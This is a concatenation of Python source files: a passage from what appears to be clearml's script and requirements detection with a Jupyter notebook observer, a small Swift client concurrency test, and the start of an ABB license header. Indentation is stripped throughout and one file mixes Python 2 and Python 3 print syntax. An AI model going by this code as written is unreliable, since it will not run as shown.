if 'sklearn' in modules:
sklearn = modules.pop('sklearn', {})
for fname, lines in sklearn.items():
modules.add('scikit_learn', fname, lines)
# if we have torch and it supports tensorboard, we should add that as well
# (because it will not be detected automatically)
if 'torch' in modules and 'tensorboard' not in modules and 'tensorboardX' not in modules:
# noinspection PyBroadException
try:
# see if this version of torch support tensorboard
# noinspection PyPackageRequirements,PyUnresolvedReferences
import torch.utils.tensorboard # noqa: F401
# noinspection PyPackageRequirements,PyUnresolvedReferences
import tensorboard # noqa: F401
modules.add('tensorboard', 'torch', 0)
except Exception:
pass
# remove setuptools, we should not specify this module version. It is installed by default
if 'setuptools' in modules:
modules.pop('setuptools', {})
# add forced requirements:
# noinspection PyBroadException
try:
from ..task import Task
# noinspection PyProtectedMember
for package, version in Task._force_requirements.items():
modules.add(package, 'clearml', 0)
except Exception:
pass
return modules
@staticmethod
def create_requirements_txt(reqs, local_pks=None):
# write requirements.txt
# noinspection PyBroadException
try:
conda_requirements = ''
conda_prefix = os.environ.get('CONDA_PREFIX')
if conda_prefix and not conda_prefix.endswith(os.path.sep):
conda_prefix += os.path.sep
if conda_prefix and sys.executable.startswith(conda_prefix):
conda_packages_json = get_command_output(['conda', 'list', '--json'])
conda_packages_json = json.loads(conda_packages_json)
reqs_lower = {k.lower(): (k, v) for k, v in reqs.items()}
for r in conda_packages_json:
# check if this is a pypi package, if it is, leave it outside
if not r.get('channel') or r.get('channel') == 'pypi':
continue
# check if we have it in our required packages
name = r['name'].lower()
# hack support pytorch/torch different naming convention
if name == 'pytorch':
name = 'torch'
k, v = None, None
if name in reqs_lower:
k, v = reqs_lower.get(name, (None, None))
else:
name = name.replace('-', '_')
if name in reqs_lower:
k, v = reqs_lower.get(name, (None, None))
if k and v is not None:
if v.version:
conda_requirements += '{0} {1} {2}\n'.format(k, '==', v.version)
else:
conda_requirements += '{0}\n'.format(k)
except Exception:
conda_requirements = ''
# add forced requirements:
forced_packages = {}
ignored_packages = ScriptRequirements._ignore_packages
# noinspection PyBroadException
try:
from ..task import Task
# noinspection PyProtectedMember
forced_packages = copy(Task._force_requirements)
# noinspection PyProtectedMember
ignored_packages = Task._ignore_requirements | ignored_packages
except Exception:
pass
# python version header
requirements_txt = '# Python ' + sys.version.replace('\n', ' ').replace('\r', ' ') + '\n'
if local_pks:
requirements_txt += '\n# Local modules found - skipping:\n'
for k, v in local_pks.sorted_items():
if v.version:
requirements_txt += '# {0} == {1}\n'.format(k, v.version)
else:
requirements_txt += '# {0}\n'.format(k)
# requirement summary
requirements_txt += '\n'
for k, v in reqs.sorted_items():
if k in ignored_packages or k.lower() in ignored_packages:
continue
version = v.version
if k in forced_packages:
forced_version = forced_packages.pop(k, None)
if forced_version is not None:
version = forced_version
# requirements_txt += ''.join(['# {0}\n'.format(c) for c in v.comments.sorted_items()])
requirements_txt += ScriptRequirements._make_req_line(k, version)
# add forced requirements that we could not find installed on the system
for k in sorted(forced_packages.keys()):
requirements_txt += ScriptRequirements._make_req_line(k, forced_packages.get(k))
requirements_txt_packages_only = \
requirements_txt + '\n# Skipping detailed import analysis, it is too large\n'
# requirements details (in comments)
requirements_txt += '\n' + \
'# Detailed import analysis\n' \
'# **************************\n'
if local_pks:
for k, v in local_pks.sorted_items():
requirements_txt += '\n'
requirements_txt += '# IMPORT LOCAL PACKAGE {0}\n'.format(k)
requirements_txt += ''.join(['# {0}\n'.format(c) for c in v.comments.sorted_items()])
for k, v in reqs.sorted_items():
requirements_txt += '\n'
if k == '-e':
requirements_txt += '# IMPORT PACKAGE {0} {1}\n'.format(k, v.version)
else:
requirements_txt += '# IMPORT PACKAGE {0}\n'.format(k)
requirements_txt += ''.join(['# {0}\n'.format(c) for c in v.comments.sorted_items()])
        # make sure we do not exceed the size limit
return (requirements_txt if len(requirements_txt) < ScriptRequirements._max_requirements_size
else requirements_txt_packages_only,
conda_requirements)
@staticmethod
def _make_req_line(k, version):
requirements_txt = ''
if k == '-e' and version:
requirements_txt += '{0}\n'.format(version)
elif k.startswith('-e '):
requirements_txt += '{0} {1}\n'.format(k.replace('-e ', '', 1), version or '')
elif version and str(version or ' ').strip()[0].isdigit():
requirements_txt += '{0} {1} {2}\n'.format(k, '==', version)
elif version and str(version).strip():
requirements_txt += '{0} {1}\n'.format(k, version)
else:
requirements_txt += '{0}\n'.format(k)
return requirements_txt
@staticmethod
def _remove_package_versions(installed_pkgs, package_names_to_remove_version):
installed_pkgs = {k: (v[0], None if str(k) in package_names_to_remove_version else v[1])
for k, v in installed_pkgs.items()}
return installed_pkgs
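# --- Illustrative sketch, not part of clearml ---
# create_requirements_txt() above only shells out to `conda list --json` when the
# running interpreter actually belongs to the active conda environment, which it
# detects by comparing sys.executable against the CONDA_PREFIX environment variable.
# The standalone helper below isolates that heuristic.
def _running_in_active_conda_env_sketch():
    import os
    import sys
    prefix = os.environ.get('CONDA_PREFIX')
    if not prefix:
        return False
    if not prefix.endswith(os.path.sep):
        prefix += os.path.sep
    return sys.executable.startswith(prefix)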
class _JupyterObserver(object):
_thread = None
_exit_event = Event()
_sync_event = Event()
_sample_frequency = 30.
_first_sample_frequency = 3.
_jupyter_history_logger = None
_store_notebook_artifact = config.get('development.store_jupyter_notebook_artifact', True)
@classmethod
def observer(cls, jupyter_notebook_filename, log_history):
if cls._thread is not None:
# order of signaling is important!
cls._exit_event.set()
cls._sync_event.set()
cls._thread.join()
if log_history and cls._jupyter_history_logger is None:
cls._jupyter_history_logger = _JupyterHistoryLogger()
cls._jupyter_history_logger.hook()
cls._sync_event.clear()
cls._exit_event.clear()
cls._thread = Thread(target=cls._daemon, args=(jupyter_notebook_filename, ))
cls._thread.daemon = True
cls._thread.start()
@classmethod
def signal_sync(cls, *_, **__):
cls._sync_event.set()
@classmethod
def close(cls):
if not cls._thread:
return
cls._exit_event.set()
cls._sync_event.set()
cls._thread.join()
cls._thread = None
@classmethod
def _daemon(cls, jupyter_notebook_filename):
from clearml import Task
# load jupyter notebook package
# noinspection PyBroadException
try:
# noinspection PyPackageRequirements
from nbconvert.exporters.script import ScriptExporter
_script_exporter = ScriptExporter()
except Exception as ex:
_logger.warning('Could not read Jupyter Notebook: {}'.format(ex))
return
# load pigar
# noinspection PyBroadException
try:
from ....utilities.pigar.reqs import get_installed_pkgs_detail, file_import_modules
from ....utilities.pigar.modules import ReqsModules
from ....utilities.pigar.log import logger
logger.setLevel(logging.WARNING)
except Exception:
file_import_modules = None
# load IPython
# noinspection PyBroadException
try:
# noinspection PyPackageRequirements
from IPython import get_ipython
except Exception:
# should not happen
get_ipython = None
# setup local notebook files
if jupyter_notebook_filename:
notebook = Path(jupyter_notebook_filename)
local_jupyter_filename = jupyter_notebook_filename
else:
notebook = None
fd, local_jupyter_filename = mkstemp(suffix='.ipynb')
os.close(fd)
last_update_ts = None
counter = 0
prev_script_hash = None
# noinspection PyBroadException
try:
from ....version import __version__
our_module = cls.__module__.split('.')[0], __version__
except Exception:
our_module = None
# noinspection PyBroadException
try:
import re
replace_ipython_pattern = re.compile(r'\n([ \t]*)get_ipython\(\)')
except Exception:
replace_ipython_pattern = None
# main observer loop, check if we need to exit
while not cls._exit_event.wait(timeout=0.):
# wait for timeout or sync event
cls._sync_event.wait(cls._sample_frequency if counter else cls._first_sample_frequency)
cls._sync_event.clear()
counter += 1
# noinspection PyBroadException
try:
# if there is no task connected, do nothing
task = Task.current_task()
if not task:
continue
script_code = None
fmodules = None
current_cell = None
# if we have a local file:
if notebook:
if not notebook.exists():
continue
# check if notebook changed
if last_update_ts is not None and notebook.stat().st_mtime - last_update_ts <= 0:
continue
last_update_ts = notebook.stat().st_mtime
else:
# serialize notebook to a temp file
if cls._jupyter_history_logger:
script_code, current_cell = cls._jupyter_history_logger.history_to_str()
else:
# noinspection PyBroadException
try:
# noinspection PyBroadException
try:
os.unlink(local_jupyter_filename)
except Exception:
pass
get_ipython().run_line_magic('history', '-t -f {}'.format(local_jupyter_filename))
with open(local_jupyter_filename, 'r') as f:
script_code = f.read()
# load the modules
from ....utilities.pigar.modules import ImportedModules
fmodules = ImportedModules()
for nm in set([str(m).split('.')[0] for m in sys.modules]):
fmodules.add(nm, 'notebook', 0)
except Exception:
continue
# get notebook python script
if script_code is None and local_jupyter_filename:
script_code, _ = _script_exporter.from_filename(local_jupyter_filename)
if cls._store_notebook_artifact:
# also upload the jupyter notebook as artifact
task.upload_artifact(
name='notebook',
artifact_object=Path(local_jupyter_filename),
preview='See `notebook preview` artifact',
metadata={'UPDATE': datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S')},
wait_on_upload=True,
)
# noinspection PyBroadException
try:
from nbconvert.exporters import HTMLExporter # noqa
html, _ = HTMLExporter().from_filename(filename=local_jupyter_filename)
local_html = Path(gettempdir()) / 'notebook_{}.html'.format(task.id)
with open(local_html.as_posix(), 'wt') as f:
f.write(html)
task.upload_artifact(
name='notebook preview', artifact_object=local_html,
preview='Click `FILE PATH` link',
metadata={'UPDATE': datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S')},
delete_after_upload=True,
wait_on_upload=True,
)
except Exception:
pass
current_script_hash = hash(script_code + (current_cell or ''))
if prev_script_hash and prev_script_hash == current_script_hash:
continue
# remove ipython direct access from the script code
# we will not be able to run them anyhow
if replace_ipython_pattern:
script_code = replace_ipython_pattern.sub(r'\n# \g<1>get_ipython()', script_code)
requirements_txt = ''
conda_requirements = ''
# parse jupyter python script and prepare pip requirements (pigar)
# if backend supports requirements
if file_import_modules and Session.check_min_api_version('2.2'):
if fmodules is None:
fmodules, _ = file_import_modules(
notebook.parts[-1] if notebook else 'notebook', script_code)
if current_cell:
cell_fmodules, _ = file_import_modules(
notebook.parts[-1] if notebook else 'notebook', current_cell)
# noinspection PyBroadException
try:
fmodules |= cell_fmodules
except Exception:
pass
# add current cell to the script
if current_cell:
script_code += '\n' + current_cell
fmodules = ScriptRequirements.add_trains_used_packages(fmodules)
# noinspection PyUnboundLocalVariable
installed_pkgs = get_installed_pkgs_detail()
# make sure we are in installed packages
if our_module and (our_module[0] not in installed_pkgs):
installed_pkgs[our_module[0]] = our_module
# noinspection PyUnboundLocalVariable
reqs = ReqsModules()
for name in fmodules:
if name in installed_pkgs:
pkg_name, version = installed_pkgs[name]
reqs.add(pkg_name, version, fmodules[name])
requirements_txt, conda_requirements = ScriptRequirements.create_requirements_txt(reqs)
# update script
prev_script_hash = current_script_hash
data_script = task.data.script
data_script.diff = script_code
data_script.requirements = {'pip': requirements_txt, 'conda': conda_requirements}
# noinspection PyProtectedMember
task._update_script(script=data_script)
# update requirements
# noinspection PyProtectedMember
task._update_requirements(requirements=requirements_txt)
except Exception:
pass
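# --- Illustrative sketch, not part of clearml ---
# _JupyterObserver above coordinates its background thread with two threading.Event
# objects: the loop wakes either when a sync is explicitly requested or after the
# sampling period elapses, and it stops as soon as the exit event is set. The
# minimal, self-contained loop below shows just that signalling pattern, with a
# hypothetical `work` callback standing in for the notebook snapshot logic.
def _event_driven_sampler_sketch(work, sample_period=30.0):
    import threading
    exit_event = threading.Event()
    sync_event = threading.Event()
    def _loop():
        while not exit_event.wait(timeout=0.):    # non-blocking exit check, as above
            sync_event.wait(sample_period)        # wake early if a sync is requested
            sync_event.clear()
            work()
    worker = threading.Thread(target=_loop, daemon=True)
    worker.start()
    # To stop: set exit_event, then sync_event, then join the worker (same order as close()).
    return exit_event, sync_event, worker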
class ScriptInfo(object):
max_diff_size_bytes = 500000
plugins = [GitEnvDetector(), HgEnvDetector(), HgDetector(), GitDetector()]
""" Script info detection plugins, in order of priority """
@classmethod
def _jupyter_install_post_store_hook(cls, jupyter_notebook_filename, log_history=False):
# noinspection PyBroadException
try:
if 'IPython' in sys.modules:
# noinspection PyPackageRequirements
from IPython import get_ipython
if get_ipython():
_JupyterObserver.observer(jupyter_notebook_filename, log_history)
get_ipython().events.register('pre_run_cell', _JupyterObserver.signal_sync)
if log_history:
get_ipython().events.register('post_run_cell', _JupyterObserver.signal_sync)
except Exception:
pass
@classmethod
def _get_jupyter_notebook_filename(cls):
if not (sys.argv[0].endswith(os.path.sep + 'ipykernel_launcher.py') or
sys.argv[0].endswith(os.path.join(os.path.sep, 'ipykernel', '__main__.py'))) \
or len(sys.argv) < 3 or not sys.argv[2].endswith('.json'):
return None
# we can safely assume that we can import the notebook package here
# noinspection PyBroadException
try:
# noinspection PyPackageRequirements
from notebook.notebookapp import list_running_servers
import requests
current_kernel = sys.argv[2].split(os.path.sep)[-1].replace('kernel-', '').replace('.json', '')
# noinspection PyBroadException
try:
server_info = next(list_running_servers())
except Exception:
# on some jupyter notebook versions this function can crash on parsing the json file,
# we will parse it manually here
# noinspection PyPackageRequirements
import ipykernel
from glob import glob
import json
for f in glob(os.path.join(os.path.dirname(ipykernel.get_connection_file()), '??server-*.json')):
# noinspection PyBroadException
try:
with open(f, 'r') as json_data:
server_info = json.load(json_data)
except Exception:
server_info = None
if server_info:
break
cookies = None
password = None
if server_info and server_info.get('password'):
# we need to get the password
from ....config import config
password = config.get('development.jupyter_server_password', '')
if not password:
_logger.warning(
'Password protected Jupyter Notebook server was found! '
'Add `sdk.development.jupyter_server_password=<jupyter_password>` to ~/clearml.conf')
return os.path.join(os.getcwd(), 'error_notebook_not_found.py')
r = requests.get(url=server_info['url'] + 'login')
cookies = {'_xsrf': r.cookies.get('_xsrf', '')}
r = requests.post(server_info['url'] + 'login?next', cookies=cookies,
data={'_xsrf': cookies['_xsrf'], 'password': password})
cookies.update(r.cookies)
auth_token = server_info.get('token') or os.getenv('JUPYTERHUB_API_TOKEN') or ''
try:
r = requests.get(
url=server_info['url'] + 'api/sessions', cookies=cookies,
headers={'Authorization': 'token {}'.format(auth_token), })
except requests.exceptions.SSLError:
# disable SSL check warning
from urllib3.exceptions import InsecureRequestWarning
# noinspection PyUnresolvedReferences
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
# fire request
r = requests.get(
url=server_info['url'] + 'api/sessions', cookies=cookies,
headers={'Authorization': 'token {}'.format(auth_token), }, verify=False)
# enable SSL check warning
import warnings
warnings.simplefilter('default', InsecureRequestWarning)
# send request to the jupyter server
try:
r.raise_for_status()
except Exception as ex:
_logger.warning('Failed accessing the jupyter server{}: {}'.format(
' [password={}]'.format(password) if server_info.get('password') else '', ex))
return os.path.join(os.getcwd(), 'error_notebook_not_found.py')
notebooks = r.json()
cur_notebook = None
for n in notebooks:
if n['kernel']['id'] == current_kernel:
cur_notebook = n
break
notebook_path = cur_notebook['notebook'].get('path', '')
notebook_name = cur_notebook['notebook'].get('name', '')
is_google_colab = False
# check if this is google.colab, then there is no local file
# noinspection PyBroadException
try:
# noinspection PyPackageRequirements
from IPython import get_ipython
if get_ipython() and 'google.colab' in get_ipython().extension_manager.loaded:
is_google_colab = True
except Exception:
pass
if is_google_colab:
script_entry_point = str(notebook_name or 'notebook').replace(
'>', '_').replace('<', '_').replace('.ipynb', '.py')
if not script_entry_point.lower().endswith('.py'):
script_entry_point += '.py'
local_ipynb_file = None
else:
# always slash, because this is from uri (so never backslash not even on windows)
entry_point_filename = notebook_path.split('/')[-1]
# now we should try to find the actual file
entry_point = (Path.cwd() / entry_point_filename).absolute()
if not entry_point.is_file():
entry_point = (Path.cwd() / notebook_path).absolute()
# fix for VSCode pushing uuid at the end of the notebook name.
if not entry_point.exists():
# noinspection PyBroadException
try:
alternative_entry_point = '-'.join(entry_point_filename.split('-')[:-5])+'.ipynb'
# now we should try to find the actual file
entry_point_alternative = (Path.cwd() / alternative_entry_point).absolute()
if not entry_point_alternative.is_file():
entry_point_alternative = (Path.cwd() / alternative_entry_point).absolute()
# If we found it replace it
if entry_point_alternative.exists():
entry_point = entry_point_alternative
except Exception as ex:
_logger.warning('Failed accessing jupyter notebook {}: {}'.format(notebook_path, ex))
# get local ipynb for observer
local_ipynb_file = entry_point.as_posix()
# now replace the .ipynb with .py
# we assume we will have that file available with the Jupyter notebook plugin
entry_point = entry_point.with_suffix('.py')
script_entry_point = entry_point.as_posix()
# install the post store hook,
# notice that if we do not have a local file we serialize/write every time the entire notebook
cls._jupyter_install_post_store_hook(local_ipynb_file, is_google_colab)
return script_entry_point
except Exception:
return None
@classmethod
def _get_entry_point(cls, repo_root, script_path):
repo_root = Path(repo_root).absolute()
try:
# Use os.path.relpath as it calculates up dir movements (../)
entry_point = os.path.relpath(
str(script_path), str(cls._get_working_dir(repo_root, return_abs=True)))
except ValueError:
# Working directory not under repository root
entry_point = script_path.relative_to(repo_root)
return Path(entry_point).as_posix()
@classmethod
def _cwd(cls):
# return the current working directory (solve for hydra changing it)
# check if running with hydra
if sys.modules.get('hydra'):
# noinspection PyBroadException
try:
# noinspection PyPackageRequirements
import hydra
return Path(hydra.utils.get_original_cwd()).absolute()
except Exception:
pass
return Path.cwd().absolute()
@classmethod
def _get_working_dir(cls, repo_root, return_abs=False):
# get the repository working directory (might be different from actual cwd)
repo_root = Path(repo_root).absolute()
cwd = cls._cwd()
try:
# do not change: test if we are under the repo root folder, it will throw an exception if we are not
relative = cwd.relative_to(repo_root).as_posix()
return cwd.as_posix() if return_abs else relative
except ValueError:
# Working directory not under repository root, default to repo root
return repo_root.as_posix() if return_abs else '.'
@classmethod
def _absolute_path(cls, file_path, cwd):
# return the absolute path, relative to a specific working directory (cwd)
file_path = Path(file_path)
if file_path.is_absolute():
return file_path.as_posix()
# Convert to absolute and squash 'path/../folder'
return os.path.abspath((Path(cwd).absolute() / file_path).as_posix())
@classmethod
def _get_script_code(cls, script_path):
# noinspection PyBroadException
try:
with open(script_path, 'r') as f:
script_code = f.read()
return script_code
except Exception:
pass
return ''
@classmethod
def _get_script_info(
cls, filepaths, check_uncommitted=True, create_requirements=True, log=None,
uncommitted_from_remote=False, detect_jupyter_notebook=True):
jupyter_filepath = cls._get_jupyter_notebook_filename() if detect_jupyter_notebook else None
if jupyter_filepath:
scripts_path = [Path(os.path.normpath(jupyter_filepath)).absolute()]
else:
cwd = cls._cwd()
scripts_path = [Path(cls._absolute_path(os.path.normpath(f), cwd)) for f in filepaths if f]
if all(not f.is_file() for f in scripts_path):
raise ScriptInfoError(
"Script file {} could not be found".format(scripts_path)
)
scripts_dir = [f.parent for f in scripts_path]
def _log(msg, *args, **kwargs):
if not log:
return
log.warning(
"Failed auto-detecting task repository: {}".format(
msg.format(*args, **kwargs)
)
)
plugin = next((p for p in cls.plugins if any(p.exists(d) for d in scripts_dir)), None)
repo_info = DetectionResult()
script_dir = scripts_dir[0]
script_path = scripts_path[0]
messages = []
auxiliary_git_diff = None
if not plugin:
if log:
log.info("No repository found, storing script code instead")
else:
try:
for i, d in enumerate(scripts_dir):
repo_info = plugin.get_info(
str(d), include_diff=check_uncommitted, diff_from_remote=uncommitted_from_remote)
if not repo_info.is_empty():
script_dir = d
script_path = scripts_path[i]
break
except SystemExit:
raise
except Exception as ex:
_log("no info for {} ({})", scripts_dir, ex)
else:
if repo_info.is_empty():
_log("no info for {}", scripts_dir)
repo_root = repo_info.root or script_dir
if not plugin:
working_dir = '.'
entry_point = str(script_path.name)
else:
working_dir = cls._get_working_dir(repo_root)
entry_point = cls._get_entry_point(repo_root, script_path)
if check_uncommitted:
diff = cls._get_script_code(script_path.as_posix()) \
if not plugin or not repo_info.commit else repo_info.diff
# make sure diff is not too big:
if len(diff) > cls.max_diff_size_bytes:
messages.append(
"======> WARNING! Git diff to large to store "
"({}kb), skipping uncommitted changes <======".format(len(diff)//1024))
auxiliary_git_diff = diff
diff = '# WARNING! git diff too large to store, clear this section to execute without it.\n' \
'# full git diff available in Artifacts/auxiliary_git_diff\n' \
'# Clear the section before enqueueing Task!\n'
else:
diff = ''
# if this is not jupyter, get the requirements.txt
requirements = ''
conda_requirements = ''
# create requirements if backend supports requirements
# if jupyter is present, requirements will be created in the background, when saving a snapshot
if not jupyter_filepath and Session.check_min_api_version('2.2'):
script_requirements = ScriptRequirements(
Path(repo_root).as_posix() if repo_info.url else script_path.as_posix())
if create_requirements:
requirements, conda_requirements = script_requirements.get_requirements()
else:
script_requirements = None
script_info = dict(
repository=remove_user_pass_from_url(repo_info.url),
branch=repo_info.branch,
version_num=repo_info.commit,
entry_point=entry_point,
working_dir=working_dir,
diff=diff,
requirements={'pip': requirements, 'conda': conda_requirements} if requirements else None,
binary='python{}.{}'.format(sys.version_info.major, sys.version_info.minor),
repo_root=repo_root,
jupyter_filepath=jupyter_filepath,
)
# if repo_info.modified:
# messages.append(
# "======> WARNING! UNCOMMITTED CHANGES IN REPOSITORY {} <======".format(
# script_info.get("repository", "")
# )
# )
if not any(script_info.values()):
script_info = None
return (ScriptInfoResult(script=script_info, warning_messages=messages, auxiliary_git_diff=auxiliary_git_diff),
script_requirements)
@classmethod
def get(cls, filepaths=None, check_uncommitted=True, create_requirements=True, log=None,
uncommitted_from_remote=False, detect_jupyter_notebook=True):
try:
if not filepaths:
filepaths = [sys.argv[0], ]
return cls._get_script_info(
filepaths=filepaths,
check_uncommitted=check_uncommitted,
create_requirements=create_requirements, log=log,
uncommitted_from_remote=uncommitted_from_remote,
detect_jupyter_notebook=detect_jupyter_notebook,
)
except SystemExit:
pass
except BaseException as ex:
if log:
log.warning("Failed auto-detecting task repository: {}".format(ex))
return ScriptInfoResult(), None
@classmethod
def is_running_from_module(cls):
# noinspection PyBroadException
try:
return '__main__' in sys.modules and vars(sys.modules['__main__'])['__package__']
except Exception:
return False
@classmethod
def detect_running_module(cls, script_dict):
# noinspection PyBroadException
try:
# If this is jupyter, do not try to detect the running module, we know what we have.
if script_dict.get('jupyter_filepath'):
return script_dict
if cls.is_running_from_module():
argvs = ''
git_root = os.path.abspath(str(script_dict['repo_root'])) if script_dict['repo_root'] else None
for a in sys.argv[1:]:
if git_root and os.path.exists(a):
# check if common to project:
a_abs = os.path.abspath(a)
if os.path.commonpath([a_abs, git_root]) == git_root:
# adjust path relative to working dir inside git repo
a = ' ' + os.path.relpath(
a_abs, os.path.join(git_root, str(script_dict['working_dir'])))
argvs += ' {}'.format(a)
# noinspection PyBroadException
try:
module_name = vars(sys.modules['__main__'])['__spec__'].name
except Exception:
module_name = vars(sys.modules['__main__'])['__package__']
# update the script entry point to match the real argv and module call
script_dict['entry_point'] = '-m {}{}'.format(module_name, (' ' + argvs) if argvs else '')
except Exception:
pass
return script_dict
@classmethod
def close(cls):
_JupyterObserver.close()
@attr.s
class ScriptInfoResult(object):
script = attr.ib(default=None)
warning_messages = attr.ib(factory=list)
auxiliary_git_diff = attr.ib(default=None)
class _JupyterHistoryLogger(object):
_reg_replace_ipython = r'\n([ \t]*)get_ipython\(\)'
_reg_replace_magic = r'\n([ \t]*)%'
_reg_replace_bang = r'\n([ \t]*)!'
def __init__(self):
self._exception_raised = False
self._cells_code = {}
self._counter = 0
self._ip = None
self._current_cell = None
# noinspection PyBroadException
try:
import re
self._replace_ipython_pattern = re.compile(self._reg_replace_ipython)
self._replace_magic_pattern = re.compile(self._reg_replace_magic)
self._replace_bang_pattern = re.compile(self._reg_replace_bang)
except Exception:
self._replace_ipython_pattern = None
self._replace_magic_pattern = None
self._replace_bang_pattern = None
def hook(self, ip=None):
if not ip:
# noinspection PyBroadException
try:
# noinspection PyPackageRequirements
from IPython import get_ipython
except Exception:
return
self._ip = get_ipython()
else:
self._ip = ip
# noinspection PyBroadException
try:
# if this is colab, the callbacks do not contain the raw_cell content, so we have to patch it
if 'google.colab' in self._ip.extension_manager.loaded:
self._ip._org_run_cell = self._ip.run_cell
self._ip.run_cell = partial(self._patched_run_cell, self._ip)
except Exception:
pass
# start with the current history
self._initialize_history()
self._ip.events.register('post_run_cell', self._post_cell_callback)
self._ip.events.register('pre_run_cell', self._pre_cell_callback)
self._ip.set_custom_exc((Exception,), self._exception_callback)
def _patched_run_cell(self, shell, *args, **kwargs):
# noinspection PyBroadException
try:
raw_cell = kwargs.get('raw_cell') or args[0]
self._current_cell = raw_cell
except Exception:
pass
# noinspection PyProtectedMember
return shell._org_run_cell(*args, **kwargs)
def history(self, filename):
with open(filename, 'wt') as f:
for k, v in sorted(self._cells_code.items(), key=lambda p: p[0]):
f.write(v)
def history_to_str(self):
# return a pair: (history as str, current cell if we are in still in cell execution otherwise None)
return '\n'.join(v for k, v in sorted(self._cells_code.items(), key=lambda p: p[0])), self._current_cell
# noinspection PyUnusedLocal
def _exception_callback(self, shell, etype, value, tb, tb_offset=None):
self._exception_raised = True
return shell.showtraceback()
def _pre_cell_callback(self, *args, **_):
# noinspection PyBroadException
try:
if args:
self._current_cell = args[0].raw_cell
# we might have this value from somewhere else
if self._current_cell:
self._current_cell = self._conform_code(self._current_cell, replace_magic_bang=True)
except Exception:
pass
def _post_cell_callback(self, *_, **__):
# noinspection PyBroadException
try:
self._current_cell = None
if self._exception_raised:
# do nothing
self._exception_raised = False
return
self._exception_raised = False
# add the cell history
# noinspection PyBroadException
try:
cell_code = '\n' + self._ip.history_manager.input_hist_parsed[-1]
except Exception:
return
# fix magic / bang in code
cell_code = self._conform_code(cell_code)
self._cells_code[self._counter] = cell_code
self._counter += 1
except Exception:
pass
def _initialize_history(self):
# only once
if -1 in self._cells_code:
return
# noinspection PyBroadException
try:
cell_code = '\n' + '\n'.join(self._ip.history_manager.input_hist_parsed[:-1])
except Exception:
return
cell_code = self._conform_code(cell_code)
self._cells_code[-1] = cell_code
def _conform_code(self, cell_code, replace_magic_bang=False):
# fix magic / bang in code
if self._replace_ipython_pattern:
cell_code = self._replace_ipython_pattern.sub(r'\n# \g<1>get_ipython()', cell_code)
if replace_magic_bang and self._replace_magic_pattern and self._replace_bang_pattern:
cell_code = self._replace_magic_pattern.sub(r'\n# \g<1>%', cell_code)
cell_code = self._replace_bang_pattern.sub(r'\n# \g<1>!', cell_code)
return cell_code
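# --- Illustrative sketch, not part of clearml ---
# _conform_code() above comments out IPython-only constructs (get_ipython() calls,
# %magic lines and !shell lines) so that the captured history remains valid plain
# Python. The self-contained demo below applies the same three substitutions to a
# small hard-coded snippet.
def _conform_code_demo():
    import re
    code = "\nget_ipython().run_line_magic('matplotlib', 'inline')\n%timeit x = 1\n!ls\n"
    code = re.sub(r'\n([ \t]*)get_ipython\(\)', r'\n# \g<1>get_ipython()', code)
    code = re.sub(r'\n([ \t]*)%', r'\n# \g<1>%', code)
    code = re.sub(r'\n([ \t]*)!', r'\n# \g<1>!', code)
    return code  # every IPython-specific line is now a plain comment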
|
client.py
|
from multiprocessing import Process
import time
import pprint
from swiftclient.client import Connection
"""
reference : https://docs.openstack.org/python-swiftclient/latest/client-api.html#examples
"""
pretty_print = pprint.PrettyPrinter(indent=4).pprint
meta_name = "x-container-meta-data"
container_meta_testdata={meta_name:2}
def get_connection_v1(user,key):
"""
conn : swiftclient connection
"""
_authurl = "http://127.0.0.1:8080/auth/v1.0"
_auth_version = '1'
_user = user
_key = key
conn = Connection(
authurl=_authurl,
user=_user,
key=_key
)
return conn
def get_account_info(conn):
"""
conn : swiftclient connection
get account info
"""
pretty_print(conn.get_account())
def get_container(conn,container):
"""
get container info
return (container_header_info,container)
"""
pretty_print(conn.get_container(container))
def head_container(conn,container):
pretty_print(conn.head_container(container))
def post_container(conn, container):
    """Update the container metadata with the module-level test headers."""
    conn.post_container(container, container_meta_testdata)
def get_object(conn, container, obj):
    """Fetch an object from the container (placeholder, not yet implemented)."""
    pass
def update_meta(conn,data):
# conn -- swiftclient connection
# data -- int , value added to cur
cur = int(conn.head_container("aaa").get(meta_name))
try:
cur += data
container_meta_testdata = {meta_name:cur}
conn.post_container("aaa",container_meta_testdata)
        print(conn.head_container("aaa").get(meta_name))
except Exception as e:
raise
def add_data(val):
print "Add val %d to meta data" % val
conn = get_connection_v1("test:tester","testing")
update_meta(conn,val)
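# --- Illustrative sketch, not part of python-swiftclient ---
# update_meta() is a head_container / post_container read-modify-write, so the four
# concurrent processes started in the __main__ block below can interleave and lose
# increments: the final metadata value may be smaller than the sum of all the values
# added. One simple way to make the experiment deterministic is to serialise the
# writers with a multiprocessing.Lock, as in this hypothetical variant of add_data().
# usage sketch: from multiprocessing import Lock; lock = Lock();
#               Process(target=add_data_serialised, args=(i, lock)).start()
def add_data_serialised(val, lock):
    with lock:
        conn = get_connection_v1("test:tester", "testing")
        update_meta(conn, val)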
if __name__ == '__main__':
p_list = []
for i in range(4):
p = Process(target=add_data,args=(i,))
p.start()
p_list.append(p)
for p in p_list:
p.join()
conn = get_connection_v1("test:tester","testing")
    print(conn.head_container("aaa").get(meta_name))
|
debug.py
|
"""Class that renders the BT in a web browser and allows ticking the tree manually."""
# Copyright (c) 2022, ABB
# All rights reserved.
#
# Redistribution and use in source and binary forms, with
# or without modification, are permitted provided that
# the following conditions are met:
#
# * Redistributions of source code must retain the
# above copyright notice, this list of conditions
# and the following disclaimer.
# * Redistributions in binary form must reproduce the
# above copyright notice, this list of conditions
# and the following disclaimer in the documentation
# and/or other materials provided with the
# distribution.
# * Neither the name of ABB nor the names of its
# contributors may be used to endorse or promote
# products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
